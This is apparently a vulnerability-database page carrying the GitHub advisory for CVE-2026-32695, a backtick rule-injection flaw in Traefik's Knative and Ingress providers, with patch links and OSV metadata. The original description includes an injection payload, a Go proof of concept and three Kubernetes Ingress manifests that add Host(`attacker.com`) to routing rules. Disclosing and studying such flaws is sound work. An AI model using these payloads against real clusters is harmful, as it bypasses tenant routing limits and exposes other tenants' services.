GHSA-67JX-R9PV-98RJ
Vulnerability from github – Published: 2026-03-27 17:49 – Updated: 2026-03-27 17:49
VLAI?
Summary
Traefik has Knative Ingress Rule Injection that Allows Host Restriction Bypass
Details
Summary
There is a potential vulnerability in Traefik's Kubernetes Knative, Ingress, and Ingress-NGINX providers related to rule injection.
User-controlled values are interpolated into backtick-delimited Traefik router rule expressions without escaping or validation. A malicious value containing a backtick can terminate the literal and inject additional operators into Traefik's rule language, altering the parsed rule tree. In shared or multi-tenant deployments, this can bypass host and header routing constraints and redirect unauthorized traffic to victim services.
Patches
- https://github.com/traefik/traefik/releases/tag/v3.6.11
- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2
For more information
If there are any questions or comments about this advisory, please open an issue.
Original Description ### Summary Traefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Severity is High in shared deployments. Tested on Traefik `v3.6.10`; the vulnerable pattern appears to have been present since the Knative provider was introduced. Earlier versions with Knative provider support are expected to be affected. ### Details The issue is caused by unsafe rule-string construction using `fmt.Sprintf` with backtick-delimited literals. Incriminated code patterns: - `pkg/provider/kubernetes/knative/kubernetes.go` - `fmt.Sprintf("Host(`%v`)", host)` - `fmt.Sprintf("Header(`%s`,`%s`)", key, headers[key].Exact)` - `fmt.Sprintf("PathPrefix(`%s`)", path)` - `pkg/provider/kubernetes/ingress/kubernetes.go` - `fmt.Sprintf("Host(`%s`)", host)` - `fmt.Sprintf("(Path(`%[1]s`) || PathPrefix(`%[1]s/`))", path)` - `pkg/provider/kubernetes/ingress-nginx/kubernetes.go` (hardening candidate; not the primary confirmed vector in this report) - `fmt.Sprintf("Header(`%s`, `%s`)", c.Header, c.HeaderValue)` - related host/path/header concatenations with backticks Because inputs are inserted directly into rule expressions, a malicious value containing a backtick can terminate the literal and inject additional operators/tokens in Traefik's rule language. Example payload: - `x`) || Host(`attacker.com` When used as a header value in Knative rule construction, the resulting rule contains: - `Header(`X-Poc`,`x`) || Host(`attacker.com`)` This alters rule semantics and enables injection into Traefik's rule language. Depending on the field used (`hosts[]` vs `headers[].exact`) this can become a direct routing bypass. Important scope note: - Gateway API code path (`pkg/provider/kubernetes/gateway/httproute.go`) already uses safer `%q` formatting for header/query rules and is not affected by this exact pattern. - For standard Kubernetes Ingress, `spec.rules.host` is validated as DNS-1123 by the API server, which rejects backticks (so this specific host-injection payload is typically blocked). - For Knative Ingress, `rules[].hosts[]` and `headers[].exact` are typed as `string` in CRD schema with no pattern constraint. - In this validation environment, `rules[].hosts[]` was accepted and produced a practical host bypass. `headers[].exact` was also accepted and produced rule-syntax injection in generated routers. - Ingress-NGINX patterns are included as follow-up hardening targets and are not claimed as independently exploitable here. - Exploitability depends on admission/validation policy and who can create these resources. ### PoC 1. Local deterministic PoC (no cluster required): - Run: - Save the inline PoC below as `poc_build_rule.go` - Run `go run poc_build_rule.go` - Observe output: - Legitimate rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`secret123`)) && PathPrefix(`/`)` - Malicious rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`x`) || Host(`attacker.com`)) && PathPrefix(`/`)` - This proves syntax injection in current string-construction logic. Inline PoC code (self-contained):package main
import (
"fmt"
"sort"
"strings"
)
func buildRuleKnative(hosts []string, headers map[string]struct{ Exact string }, path string) string {
var operands []string
if len(hosts) > 0 {
var hostRules []string
for _, host := range hosts {
hostRules = append(hostRules, fmt.Sprintf("Host(`%v`)", host))
}
operands = append(operands, fmt.Sprintf("(%s)", strings.Join(hostRules, " || ")))
}
if len(headers) > 0 {
headerKeys := make([]string, 0, len(headers))
for k := range headers {
headerKeys = append(headerKeys, k)
}
sort.Strings(headerKeys)
var headerRules []string
for _, key := range headerKeys {
headerRules = append(headerRules, fmt.Sprintf("Header(`%s`,`%s`)", key, headers[key].Exact))
}
operands = append(operands, fmt.Sprintf("(%s)", strings.Join(headerRules, " && ")))
}
if len(path) > 0 {
operands = append(operands, fmt.Sprintf("PathPrefix(`%s`)", path))
}
return strings.Join(operands, " && ")
}
func main() {
legitHeaders := map[string]struct{ Exact string }{
"X-API-Key": {Exact: "secret123"},
}
fmt.Println(buildRuleKnative([]string{"tenant.example.com"}, legitHeaders, "/"))
maliciousHeaders := map[string]struct{ Exact string }{
"X-API-Key": {Exact: "x`) || Host(`attacker.com"},
}
fmt.Println(buildRuleKnative([]string{"tenant.example.com"}, maliciousHeaders, "/"))
// Safe variant example (Gateway-style):
fmt.Println(fmt.Sprintf("Header(%q,%q)", "X-API-Key", "x`) || Host(`attacker.com"))
}
apiVersion: networking.internal.knative.dev/v1alpha1
kind: Ingress
metadata:
name: poc-host-injection
namespace: default
annotations:
# This exact key worked in live validation:
networking.knative.dev/ingress.class: "traefik.ingress.networking.knative.dev"
spec:
rules:
- hosts:
- 'tenant.example.com`) || Host(`attacker.com'
visibility: External
http:
paths:
- path: "/"
splits:
- percent: 100
serviceName: dummy
serviceNamespace: default
servicePort: 80
YAML
apiVersion: networking.internal.knative.dev/v1alpha1
kind: Ingress
metadata:
name: poc-rule-injection
namespace: default
annotations:
networking.knative.dev/ingress.class: "traefik.ingress.networking.knative.dev"
spec:
rules:
- hosts:
- "tenant.example.com"
visibility: External
http:
paths:
- path: "/"
headers:
X-Poc:
exact: 'x`) || Host(`attacker.com'
splits:
- percent: 100
serviceName: dummy
serviceNamespace: default
servicePort: 80
YAML
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: poc-ingress-host-injection
namespace: default
annotations:
kubernetes.io/ingress.class: traefik
spec:
rules:
- host: 'tenant.example.com`) || Host(`attacker.com'
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: dummy
port:
number: 80
YAML
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0-ea.1"
},
{
"fixed": "3.7.0-ea.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.11.42"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32695"
],
"database_specific": {
"cwe_ids": [
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T17:49:52Z",
"nvd_published_at": "2026-03-27T14:16:08Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThere is a potential vulnerability in Traefik\u0027s Kubernetes Knative, Ingress, and Ingress-NGINX providers related to rule injection.\n\nUser-controlled values are interpolated into backtick-delimited Traefik router rule expressions without escaping or validation. A malicious value containing a backtick can terminate the literal and inject additional operators into Traefik\u0027s rule language, altering the parsed rule tree. In shared or multi-tenant deployments, this can bypass host and header routing constraints and redirect unauthorized traffic to victim services.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nTraefik\u0027s Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Severity is High in shared deployments.\n\nTested on Traefik `v3.6.10`; the vulnerable pattern appears to have been present since the Knative provider was introduced. Earlier versions with Knative provider support are expected to be affected.\n\n### Details\nThe issue is caused by unsafe rule-string construction using `fmt.Sprintf` with backtick-delimited literals.\n\nIncriminated code patterns:\n\n- `pkg/provider/kubernetes/knative/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%v`)\", host)`\n - `fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact)`\n - `fmt.Sprintf(\"PathPrefix(`%s`)\", path)`\n\n- `pkg/provider/kubernetes/ingress/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%s`)\", host)`\n - `fmt.Sprintf(\"(Path(`%[1]s`) || PathPrefix(`%[1]s/`))\", path)`\n\n- `pkg/provider/kubernetes/ingress-nginx/kubernetes.go` (hardening candidate; not the primary confirmed vector in this report)\n - `fmt.Sprintf(\"Header(`%s`, `%s`)\", c.Header, c.HeaderValue)`\n - related host/path/header concatenations with backticks\n\nBecause inputs are inserted directly into rule expressions, a malicious value containing a backtick can terminate the literal and inject additional operators/tokens in Traefik\u0027s rule language. Example payload:\n\n- `x`) || Host(`attacker.com`\n\nWhen used as a header value in Knative rule construction, the resulting rule contains:\n\n- `Header(`X-Poc`,`x`) || Host(`attacker.com`)`\n\nThis alters rule semantics and enables injection into Traefik\u0027s rule language. Depending on the field used (`hosts[]` vs `headers[].exact`) this can become a direct routing bypass.\n\nImportant scope note:\n\n- Gateway API code path (`pkg/provider/kubernetes/gateway/httproute.go`) already uses safer `%q` formatting for header/query rules and is not affected by this exact pattern.\n- For standard Kubernetes Ingress, `spec.rules.host` is validated as DNS-1123 by the API server, which rejects backticks (so this specific host-injection payload is typically blocked).\n- For Knative Ingress, `rules[].hosts[]` and `headers[].exact` are typed as `string` in CRD schema with no pattern constraint.\n- In this validation environment, `rules[].hosts[]` was accepted and produced a practical host bypass. `headers[].exact` was also accepted and produced rule-syntax injection in generated routers.\n- Ingress-NGINX patterns are included as follow-up hardening targets and are not claimed as independently exploitable here.\n- Exploitability depends on admission/validation policy and who can create these resources.\n\n### PoC\n\n1. Local deterministic PoC (no cluster required):\n\n- Run:\n - Save the inline PoC below as `poc_build_rule.go`\n - Run `go run poc_build_rule.go`\n- Observe output:\n - Legitimate rule: `(Host(`tenant.example.com`)) \u0026\u0026 (Header(`X-API-Key`,`secret123`)) \u0026\u0026 PathPrefix(`/`)`\n - Malicious rule: `(Host(`tenant.example.com`)) \u0026\u0026 (Header(`X-API-Key`,`x`) || Host(`attacker.com`)) \u0026\u0026 PathPrefix(`/`)`\n- This proves syntax injection in current string-construction logic.\n\nInline PoC code (self-contained):\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"sort\"\n\t\"strings\"\n)\n\nfunc buildRuleKnative(hosts []string, headers map[string]struct{ Exact string }, path string) string {\n\tvar operands []string\n\n\tif len(hosts) \u003e 0 {\n\t\tvar hostRules []string\n\t\tfor _, host := range hosts {\n\t\t\thostRules = append(hostRules, fmt.Sprintf(\"Host(`%v`)\", host))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(hostRules, \" || \")))\n\t}\n\n\tif len(headers) \u003e 0 {\n\t\theaderKeys := make([]string, 0, len(headers))\n\t\tfor k := range headers {\n\t\t\theaderKeys = append(headerKeys, k)\n\t\t}\n\t\tsort.Strings(headerKeys)\n\n\t\tvar headerRules []string\n\t\tfor _, key := range headerKeys {\n\t\t\theaderRules = append(headerRules, fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(headerRules, \" \u0026\u0026 \")))\n\t}\n\n\tif len(path) \u003e 0 {\n\t\toperands = append(operands, fmt.Sprintf(\"PathPrefix(`%s`)\", path))\n\t}\n\n\treturn strings.Join(operands, \" \u0026\u0026 \")\n}\n\nfunc main() {\n\tlegitHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"secret123\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, legitHeaders, \"/\"))\n\n\tmaliciousHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"x`) || Host(`attacker.com\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, maliciousHeaders, \"/\"))\n\n\t// Safe variant example (Gateway-style):\n\tfmt.Println(fmt.Sprintf(\"Header(%q,%q)\", \"X-API-Key\", \"x`) || Host(`attacker.com\"))\n}\n```\n\n2. Cluster PoC (Knative host injection, primary / practical bypass):\n\n- Preconditions:\n - Kubernetes test cluster with Knative Serving.\n - Traefik configured with Knative provider.\n- Apply manifest:\n - `kubectl apply -f - \u003c\u003c\u0027YAML\u0027`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-host-injection\n namespace: default\n annotations:\n # This exact key worked in live validation:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - \u0027tenant.example.com`) || Host(`attacker.com\u0027\n visibility: External\n http:\n paths:\n - path: \"/\"\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n - (If API version mismatch, adjust between `networking.internal.knative.dev/v1alpha1` and `networking.knative.dev/v1alpha1`.)\n- Verify:\n - Check Traefik router rule contains: `(Host(`tenant.example.com`) || Host(`attacker.com`)) \u0026\u0026 PathPrefix(`/`)`.\n - Request with `Host: attacker.com` returns backend 200.\n - This demonstrates host restriction bypass in practice.\n\n3. Cluster PoC (Knative header injection, confirms rule-syntax injection):\n\n- Apply:\n - `kubectl apply -f - \u003c\u003c\u0027YAML\u0027`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-rule-injection\n namespace: default\n annotations:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - \"tenant.example.com\"\n visibility: External\n http:\n paths:\n - path: \"/\"\n headers:\n X-Poc:\n exact: \u0027x`) || Host(`attacker.com\u0027\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n- Verify:\n - Inspect generated Traefik dynamic router rule (API/dashboard/logs).\n - Confirm injected fragment `|| Host(`attacker.com`)` is present.\n - Send request with `Host: attacker.com` and no expected tenant header (expected: 404 for this payload shape, because leading `Host(tenant)` still applies).\n - Send request with `Host: tenant.example.com` and `X-Poc: x` (expected: 200 from backend).\n\n4. Optional Ingress PoC (scope check):\n\n- Apply:\n - `kubectl apply -f - \u003c\u003c\u0027YAML\u0027`\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: poc-ingress-host-injection\n namespace: default\n annotations:\n kubernetes.io/ingress.class: traefik\nspec:\n rules:\n - host: \u0027tenant.example.com`) || Host(`attacker.com\u0027\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: dummy\n port:\n number: 80\nYAML\n```\n- Expected in most clusters: API server rejects this payload because Ingress `host` must satisfy DNS-1123.\n- Keep this step only as a negative control to demonstrate the distinction between native Ingress validation and Knative CRD behavior.\n\nValidation executed in this report:\n\n- Local deterministic PoC executed with `go run` and output matched expected injected rule.\n- Live cluster test executed on local `kind` cluster (`kind-traefik-poc`) with Traefik `v3.6.10` and Knative Serving CRDs.\n- Annotation key confirmed in this environment: `networking.knative.dev/ingress.class` (dot). The hyphen variant was not used by the successful processing path.\n- Traefik API/logs confirmed generated routers included injected expressions.\n- Live HTTP request with `Host: attacker.com` reached backend (`200`) for Knative host-injection payload.\n\n### Impact\n- **Vulnerability type:** Rule injection / authorization bypass at routing layer.\n- **Primary impact:** Bypass of intended routing predicates (host/header/path), enabling unauthorized routing to protected services.\n- **Who is impacted:** Primarily deployments using Traefik Knative provider where untrusted or semi-trusted actors can create/update Knative Ingress resources (typical in multi-tenant clusters, shared namespaces, or weak admission controls). Standard Kubernetes Ingress host injection is usually blocked by API validation.\n- **Security consequences:** Cross-tenant traffic access, internal service exposure, policy bypass, and potential chaining with app-level vulnerabilities.\n\n\u003c/details\u003e",
"id": "GHSA-67jx-r9pv-98rj",
"modified": "2026-03-27T17:49:52Z",
"published": "2026-03-27T17:49:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-67jx-r9pv-98rj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32695"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/commit/11d251415a6fd935025df5a9dda898e17e3097b2"
},
{
"type": "PACKAGE",
"url": "https://github.com/traefik/traefik"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Traefik has Knative Ingress Rule Injection that Allows Host Restriction Bypass"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…